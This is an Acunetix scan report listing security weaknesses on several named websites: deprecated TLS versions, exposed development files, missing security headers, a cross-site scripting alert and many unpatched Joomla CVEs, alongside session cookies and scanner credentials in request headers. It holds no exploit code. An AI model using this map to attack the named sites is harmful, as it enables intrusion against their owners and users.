Developer All Vulnerabilities
Developer All Vulnerabilities
Report
Acunetix Security Audit
2023-07-28
Generated by Acunetix
1
Vulnerabilities
Scan details
Scan information
Start url https://macgrae.ci/adhesion
Host https://macgrae.ci/
Threat level
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
2
Alerts summary
TLS 1.0 enabled
Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
CVSS3
User Interaction: None
Scope: Changed
Authentication: None
CWE CWE-326
Affected items Variation
Web Server 1
Development configuration files
Classification
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
3
Base Score: 5.0
Authentication: None
CWE CWE-538
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
CVSS3
User Interaction: None
Scope: Changed
Authentication: None
CWE CWE-326
Affected items Variation
Web Server 1
4
Alerts details
TLS 1.0 enabled
Severity High
Reported by module /Scripts/PerServer/SSL_Audit.script
Description
The web server supports encryption through TLS 1.0, which was formally deprecated in March 2021 as a result of inherent
security issues.
In addition, TLS 1.0 is not considered to be "strong cryptography" as defined and required by the PCI Data
Security Standard 3.2(.1) when used to protect sensitive information transferred to or from web sites.
According to PCI, "30
June 2018 is the deadline for disabling SSL/early TLS and implementing a more secure encryption protocol – TLS 1.1 or
higher (TLS v1.2 is strongly encouraged) in order to meet the PCI Data Security Standard (PCI DSS) for safeguarding
payment data.
Impact
An attacker may be able to exploit this problem to conduct man-in-the-middle attacks and decrypt communications between
the affected service and clients.
Recommendation
It is recommended to disable TLS 1.0 and replace it with TLS 1.2 or higher.
References
Are You Ready for 30 June 2018? Saying Goodbye to SSL/early TLS (https://blog.pcisecuritystandards.org/are-you-ready-
for-30-june-2018-sayin-goodbye-to-ssl-early-tls)
PCI 3.1 and TLS 1.2 (Cloudflare Support) (https://support.cloudflare.com/hc/en-us/articles/205043158-PCI-3-1-and-TLS-1-
2)
Affected items
Web Server
Details
The SSL server (port: 443) encrypts traffic using TLSv1.0.
Request headers
Development configuration files
Severity Medium
Reported by module /Scripts/PerFolder/Development_Files.script
Description
One or more configuration files (e.g. Vagrantfile, Gemfile, Rakefile, ...) were found. These files may expose sensitive
information that could help a malicious user to prepare more advanced attacks. It's recommended to remove or restrict
access to this type of files from production systems.
Impact
5
These files may disclose sensitive information. This information can be used to launch further attacks.
Recommendation
Affected items
Web Server
Details
Development configuration files:
https://macgrae.ci/bootstrap-4/Gemfile
Gemfile => A format for describing gem dependencies for Ruby programs.
https://macgrae.ci/bootstrap-4/Gemfile.lock
Gemfile.lock => A format for describing gem dependencies for Ruby programs.
https://macgrae.ci/bootstrap-4/package.json
https://macgrae.ci/bootstrap-4/composer.json
https://macgrae.ci/bootstrap-4/.travis.yml
.travis.yml => Travis CI configuration file. Travis CI makes working in a team for a
https://macgrae.ci/bootstrap-4/package-lock.json
package-lock.json => npm file. This file keeps track of the exact version of every pa
Request headers
GET /bootstrap-4/Gemfile HTTP/1.1
Cookie: PHPSESSID=qdrsoisvooap6u1unh4c7c0p71
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: macgrae.ci
Connection: Keep-alive
TLS 1.1 enabled
Severity Medium
Reported by module /Scripts/PerServer/SSL_Audit.script
6
Description
The web server supports encryption through TLS 1.1, which was formally deprecated in March 2021 as a result of inherent
security issues.
When aiming for Payment Card Industry (PCI) Data Security Standard (DSS) compliance, it is
recommended to use TLS 1.2 or higher instead.
According to PCI, "30 June 2018 is the deadline for disabling SSL/early
TLS and implementing a more secure encryption protocol – TLS 1.1 or higher (TLS v1.2 is strongly encouraged) in order to
meet the PCI Data Security Standard (PCI DSS) for safeguarding payment data.
Impact
An attacker may be able to exploit this problem to conduct man-in-the-middle attacks and decrypt communications between
the affected service and clients.
Recommendation
It is recommended to disable TLS 1.1 and replace it with TLS 1.2 or higher.
References
Are You Ready for 30 June 2018? Saying Goodbye to SSL/early TLS (https://blog.pcisecuritystandards.org/are-you-ready-
for-30-june-2018-sayin-goodbye-to-ssl-early-tls)
PCI 3.1 and TLS 1.2 (Cloudflare Support) (https://support.cloudflare.com/hc/en-us/articles/205043158-PCI-3-1-and-TLS-1-
2)
Affected items
Web Server
Details
The SSL server (port: 443) encrypts traffic using TLSv1.1.
Request headers
7
Scanned items (coverage report)
https://macgrae.ci/
8
Vulnerabilities
Scan details
Scan information
Start url https://macgrae.ci/
Host https://macgrae.ci/
Threat level
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
9
Alerts summary
TLS 1.0 enabled
Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
CVSS3
User Interaction: None
Scope: Changed
Authentication: None
CWE CWE-326
Affected items Variation
Web Server 1
Development configuration files
Classification
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
10
Base Score: 5.0
Authentication: None
CWE CWE-538
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
CVSS3
User Interaction: None
Scope: Changed
Authentication: None
CWE CWE-326
Affected items Variation
Web Server 1
11
Alerts details
TLS 1.0 enabled
Severity High
Reported by module /Scripts/PerServer/SSL_Audit.script
Description
The web server supports encryption through TLS 1.0, which was formally deprecated in March 2021 as a result of inherent
security issues.
In addition, TLS 1.0 is not considered to be "strong cryptography" as defined and required by the PCI Data
Security Standard 3.2(.1) when used to protect sensitive information transferred to or from web sites.
According to PCI, "30
June 2018 is the deadline for disabling SSL/early TLS and implementing a more secure encryption protocol – TLS 1.1 or
higher (TLS v1.2 is strongly encouraged) in order to meet the PCI Data Security Standard (PCI DSS) for safeguarding
payment data.
Impact
An attacker may be able to exploit this problem to conduct man-in-the-middle attacks and decrypt communications between
the affected service and clients.
Recommendation
It is recommended to disable TLS 1.0 and replace it with TLS 1.2 or higher.
References
Are You Ready for 30 June 2018? Saying Goodbye to SSL/early TLS (https://blog.pcisecuritystandards.org/are-you-ready-
for-30-june-2018-sayin-goodbye-to-ssl-early-tls)
PCI 3.1 and TLS 1.2 (Cloudflare Support) (https://support.cloudflare.com/hc/en-us/articles/205043158-PCI-3-1-and-TLS-1-
2)
Affected items
Web Server
Details
The SSL server (port: 443) encrypts traffic using TLSv1.0.
Request headers
Development configuration files
Severity Medium
Reported by module /Scripts/PerFolder/Development_Files.script
Description
One or more configuration files (e.g. Vagrantfile, Gemfile, Rakefile, ...) were found. These files may expose sensitive
information that could help a malicious user to prepare more advanced attacks. It's recommended to remove or restrict
access to this type of files from production systems.
Impact
12
These files may disclose sensitive information. This information can be used to launch further attacks.
Recommendation
Affected items
Web Server
Details
Development configuration files:
https://macgrae.ci/bootstrap-4/Gemfile
Gemfile => A format for describing gem dependencies for Ruby programs.
https://macgrae.ci/bootstrap-4/Gemfile.lock
Gemfile.lock => A format for describing gem dependencies for Ruby programs.
https://macgrae.ci/bootstrap-4/package.json
https://macgrae.ci/bootstrap-4/composer.json
https://macgrae.ci/bootstrap-4/.travis.yml
.travis.yml => Travis CI configuration file. Travis CI makes working in a team for a
https://macgrae.ci/bootstrap-4/package-lock.json
package-lock.json => npm file. This file keeps track of the exact version of every pa
https://macgrae.ci/js/jquery-ui-1.12.1/package.json
Request headers
GET /bootstrap-4/Gemfile HTTP/1.1
Cookie: PHPSESSID=gupt00ceptea0bp7s2q0dui7q1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: macgrae.ci
Connection: Keep-alive
TLS 1.1 enabled
13
Severity Medium
Reported by module /Scripts/PerServer/SSL_Audit.script
Description
The web server supports encryption through TLS 1.1, which was formally deprecated in March 2021 as a result of inherent
security issues.
When aiming for Payment Card Industry (PCI) Data Security Standard (DSS) compliance, it is
recommended to use TLS 1.2 or higher instead.
According to PCI, "30 June 2018 is the deadline for disabling SSL/early
TLS and implementing a more secure encryption protocol – TLS 1.1 or higher (TLS v1.2 is strongly encouraged) in order to
meet the PCI Data Security Standard (PCI DSS) for safeguarding payment data.
Impact
An attacker may be able to exploit this problem to conduct man-in-the-middle attacks and decrypt communications between
the affected service and clients.
Recommendation
It is recommended to disable TLS 1.1 and replace it with TLS 1.2 or higher.
References
Are You Ready for 30 June 2018? Saying Goodbye to SSL/early TLS (https://blog.pcisecuritystandards.org/are-you-ready-
for-30-june-2018-sayin-goodbye-to-ssl-early-tls)
PCI 3.1 and TLS 1.2 (Cloudflare Support) (https://support.cloudflare.com/hc/en-us/articles/205043158-PCI-3-1-and-TLS-1-
2)
Affected items
Web Server
Details
The SSL server (port: 443) encrypts traffic using TLSv1.1.
Request headers
14
Scanned items (coverage report)
https://macgrae.ci/
15
Vulnerabilities
Scan details
Scan information
Start url https://portail.nsiaassurances.ci/
Host https://portail.nsiaassurances.ci/
Threat level
Alerts distribution
16
Alerts summary
Content Security Policy (CSP) not implemented
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CWE CWE-1021
Affected items Variation
Web Server 1
HTTP Strict Transport Security (HSTS) not following best practices
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
CVSS3
User Interaction: Required
Scope: Changed
17
Base Score: 0.0
Authentication: None
CWE CWE-16
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CWE CWE-1021
Affected items Variation
Web Server 1
Classification
18
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CWE CWE-16
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:N
CVSS3
User Interaction: None
Scope: Changed
Authentication: None
19
CWE CWE-830
Affected items Variation
Web Server 1
20
Alerts details
Content Security Policy (CSP) not implemented
Severity Informational
Reported by module /httpdata/CSP_not_implemented.js
Description
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks,
including Cross Site Scripting (XSS) and data injection attacks.
Content Security Policy (CSP) can be implemented by adding a Content-Security-Policy header. The value of this header
is a string containing the policy directives describing your Content Security Policy. To implement CSP, you should define
lists of allowed origins for the all of the types of resources that your site utilizes. For example, if you have a simple site that
needs to load scripts, stylesheets, and images hosted locally, as well as from the jQuery library from their CDN, the CSP
header could look like the following:
Content-Security-Policy:
default-src 'self';
It was detected that your web application doesn't implement Content Security Policy (CSP) as the CSP header is missing
from the response. It's recommended to implement Content Security Policy (CSP) into your web application.
Impact
CSP can be used to prevent and/or mitigate attacks that involve content/code injection, such as cross-site scripting/XSS
attacks, attacks that require embedding a malicious resource, attacks that involve malicious use of iframes, such as
clickjacking attacks, and others.
Recommendation
It's recommended to implement Content Security Policy (CSP) into your web application. Configuring Content Security
Policy involves adding the Content-Security-Policy HTTP header to a web page and giving it values to control resources
the user agent is allowed to load for that page.
References
Affected items
Web Server
Details
21
Paths without CSP header:
https://portail.nsiaassurances.ci/
https://portail.nsiaassurances.ci/sitemap.xml
https://portail.nsiaassurances.ci/sitemap.xml.gz
https://portail.nsiaassurances.ci/auth/login
https://portail.nsiaassurances.ci/auth/reset
https://portail.nsiaassurances.ci/auth/
https://portail.nsiaassurances.ci/auth
Request headers
GET / HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: bb88e596a671e4e023f864858db27c3a
Acunetix-Aspect-ScanID: 8424555818535376921
Acunetix-Aspect-Queries: filelist;packages;aspectalerts;routes
Referer: https://portail.nsiaassurances.ci/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: portail.nsiaassurances.ci
Connection: Keep-alive
HTTP Strict Transport Security (HSTS) not following best practices
Severity Informational
Reported by module /httpdata/HSTS_not_implemented.js
Description
HTTP Strict Transport Security (HSTS) instructs a web browser to only connect to a web site using HTTPS.
It was detected
that your web application's HTTP Strict Transport Security (HSTS) implementation is not as strict as is typically advisable.
Impact
HSTS can be used to prevent and/or mitigate some types of man-in-the-middle (MitM) attacks
22
Recommendation
It is recommended to implement best practices of HTTP Strict Transport Security (HSTS) in your web application. Consult
web references for more information.
References
hstspreload.org (https://hstspreload.org/)
Affected items
Web Server
Details
URLs where HSTS configuration is not according to best practices:
Request headers
GET / HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: bb88e596a671e4e023f864858db27c3a
Acunetix-Aspect-ScanID: 8424555818535376921
Acunetix-Aspect-Queries: filelist;packages;aspectalerts;routes
Referer: https://portail.nsiaassurances.ci/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: portail.nsiaassurances.ci
Connection: Keep-alive
Permissions-Policy header not implemented
Severity Informational
Reported by module /httpdata/permissions_policy.js
23
Description
The Permissions-Policy header allows developers to selectively enable and disable use of various browser features and
APIs.
Impact
Recommendation
References
Affected items
Web Server
Details
Locations without Permissions-Policy header:
https://portail.nsiaassurances.ci/
https://portail.nsiaassurances.ci/sitemap.xml
https://portail.nsiaassurances.ci/sitemap.xml.gz
https://portail.nsiaassurances.ci/assets/
https://portail.nsiaassurances.ci/assets/langs/
https://portail.nsiaassurances.ci/auth/login
https://portail.nsiaassurances.ci/auth/reset
https://portail.nsiaassurances.ci/auth/
https://portail.nsiaassurances.ci/auth
Request headers
GET / HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: bb88e596a671e4e023f864858db27c3a
Acunetix-Aspect-ScanID: 8424555818535376921
Acunetix-Aspect-Queries: filelist;packages;aspectalerts;routes
Referer: https://portail.nsiaassurances.ci/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: portail.nsiaassurances.ci
Connection: Keep-alive
24
Reverse proxy detected
Severity Informational
Reported by module /target/RevProxy_Detection.js
Description
This server uses a reverse proxy, a load balancer or a CDN (Content Delivery Network) or it's hosted in a cloud provider.
Acunetix detected this by sending various payloads and detecting changes in headers and body.
Impact
Recommendation
None
Affected items
Web Server
Details
Detected reverse proxy: Apache httpd
Request headers
GET / HTTP/1.1
Max-Forwards: 0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: portail.nsiaassurances.ci
Connection: Keep-alive
Subresource Integrity (SRI) not implemented
Severity Informational
Reported by module /RPA/SRI_Not_Implemented.js
Description
Subresource Integrity (SRI) is a security feature that enables browsers to verify that third-party resources they fetch (for
example, from a CDN) are delivered without unexpected manipulation. It works by allowing developers to provide a
cryptographic hash that a fetched file must match.
Third-party resources (such as scripts and stylesheets) can be manipulated. An attacker that has access or has hacked the
25
hosting CDN can manipulate or replace the files. SRI allows developers to specify a base64-encoded cryptographic hash of
the resource to be loaded. The integrity attribute containing the hash is then added to the <script> HTML element tag. The
integrity string consists of a base64-encoded hash, followed by a prefix that depends on the hash algorithm. This prefix can
either be sha256, sha384 or sha512.
The script loaded from the external URL specified in the Details section doesn't implement Subresource Integrity (SRI). It's
recommended to implement Subresource Integrity (SRI) for all the scripts loaded from external hosts.
Impact
An attacker that has access or has hacked the hosting CDN can manipulate or replace the files.
Recommendation
Use the SRI Hash Generator link (from the References section) to generate a <script> element that implements
Subresource Integrity (SRI).
For example, you can use the following <script> element to tell a browser that before executing the
https://example.com/example-framework.js script, the browser must first compare the script to the expected hash, and
verify that there's a match.
<script src="https://example.com/example-framework.js"
integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
crossorigin="anonymous"></script>
References
Affected items
Web Server
Details
Pages where SRI is not implemented:
https://portail.nsiaassurances.ci/
Request headers
26
GET / HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: bb88e596a671e4e023f864858db27c3a
Acunetix-Aspect-ScanID: 8424555818535376921
Acunetix-Aspect-Queries: filelist;packages;aspectalerts;routes
Referer: https://portail.nsiaassurances.ci/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: portail.nsiaassurances.ci
Connection: Keep-alive
27
Scanned items (coverage report)
https://portail.nsiaassurances.ci/
28
Vulnerabilities
Scan details
Scan information
Start url https://www.sogbci.com/
Host https://www.sogbci.com/
Threat level
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
29
Alerts summary
Cross site scripting
Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CWE CWE-79
Affected items Variation
/contacts 1
Joomla! Core 3.x.x Cross-Site Request Forgery (3.0.0 - 3.9.26)
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
30
Base Score: 4.3
Authentication: None
CVE CVE-2021-26033
CWE CWE-352
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
Authentication: None
CVE CVE-2021-26034
CWE CWE-352
Affected items Variation
Web Server 1
Classification
31
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
Authentication: None
CVE CVE-2019-18650
CWE CWE-352
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
32
Base Score: 4.3
Authentication: None
CVE CVE-2018-6380
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2019-16725
CWE CWE-79
Affected items Variation
Web Server 1
Classification
33
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2020-10242
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
34
Base Score: 4.3
Authentication: None
CVE CVE-2020-13761
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2020-13762
CWE CWE-79
Affected items Variation
Web Server 1
Classification
35
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2020-11022
CVE CVE-2020-11023
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
36
Base Score: 3.5
Authentication: Single
CVE CVE-2020-15696
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2021-26030
CWE CWE-79
Affected items Variation
Web Server 1
Classification
37
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2021-26032
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
38
Base Score: 3.5
Authentication: Single
CVE CVE-2021-26039
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2021-26035
CWE CWE-79
Affected items Variation
Web Server 1
39
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2021-23125
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
40
Base Score: 4.3
Authentication: None
CVE CVE-2018-11328
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2019-9712
CWE CWE-79
Affected items Variation
Web Server 1
Classification
41
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2019-12766
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS3
User Interaction: None
Scope: Unchanged
42
Base Score: 6.0
Authentication: Single
CVE CVE-2021-23132
CWE CWE-22
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2021-26028
CWE CWE-22
Affected items Variation
Web Server 1
Classification
43
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CVE CVE-2018-11325
CWE CWE-200
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
44
Base Score: 5.0
Authentication: None
CVE CVE-2020-15698
CWE CWE-200
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2018-11327
CWE CWE-200
Affected items Variation
Web Server 1
Classification
45
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CVE CVE-2017-8057
CWE CWE-200
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Unchanged
46
Base Score: 5.0
Authentication: None
CVE CVE-2019-18674
CWE CWE-200
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
CVSS3
User Interaction: None
Scope: Changed
Authentication: None
CVE CVE-2021-26031
CWE CWE-22
Affected items Variation
Web Server 1
Joomla! Core 3.x.x Multiple Cross-Site Request Forgery Vulnerabilities (3.0.0 - 3.9.14)
Classification
47
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
Authentication: None
CVE CVE-2020-8419
CVE CVE-2020-8420
CWE CWE-352
Affected items Variation
Web Server 1
Joomla! Core 3.x.x Multiple Cross-Site Request Forgery Vulnerabilities (3.2.0 - 3.9.15)
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Unchanged
48
Base Score: 4.3
Authentication: None
CVE CVE-2020-10241
CWE CWE-352
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2018-11326
CWE CWE-79
Affected items Variation
Web Server 1
Classification
49
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2019-9711
CVE CVE-2019-9714
CWE CWE-79
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
50
Base Score: 5.0
Authentication: None
CVE CVE-2017-7984
CVE CVE-2017-7987
CVE CVE-2017-7989
CWE CWE-79
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: None
CVE CVE-2020-24598
CWE CWE-601
Affected items Variation
51
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
CVSS3
User Interaction: Required
Scope: Changed
Authentication: Single
CVE CVE-2019-11358
CWE CWE-610
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L
CVSS3
User Interaction: Required
Scope: Unchanged
52
Base Score: 5.1
Authentication: None
CVE CVE-2018-11324
CWE CWE-362
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CVE CVE-2020-10240
CWE CWE-264
Affected items Variation
Web Server 1
Classification
53
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2020-15697
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
54
Base Score: 5.5
Authentication: Single
CVE CVE-2021-23123
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2021-26027
CWE CWE-264
Affected items Variation
Web Server 1
Classification
55
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2018-17857
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
56
Base Score: 5.0
Authentication: None
CVE CVE-2017-16634
CWE CWE-287
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2021-23128
CWE CWE-264
Affected items Variation
Web Server 1
Classification
57
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: Single
CVE CVE-2021-23131
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
58
Base Score: 2.1
Authentication: Single
CVE CVE-2021-23126
CVE CVE-2021-23127
CWE CWE-264
Affected items Variation
Web Server 1
Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVSS3
User Interaction: None
Scope: Unchanged
Authentication: None
CVE CVE-2019-10946
CWE CWE-264
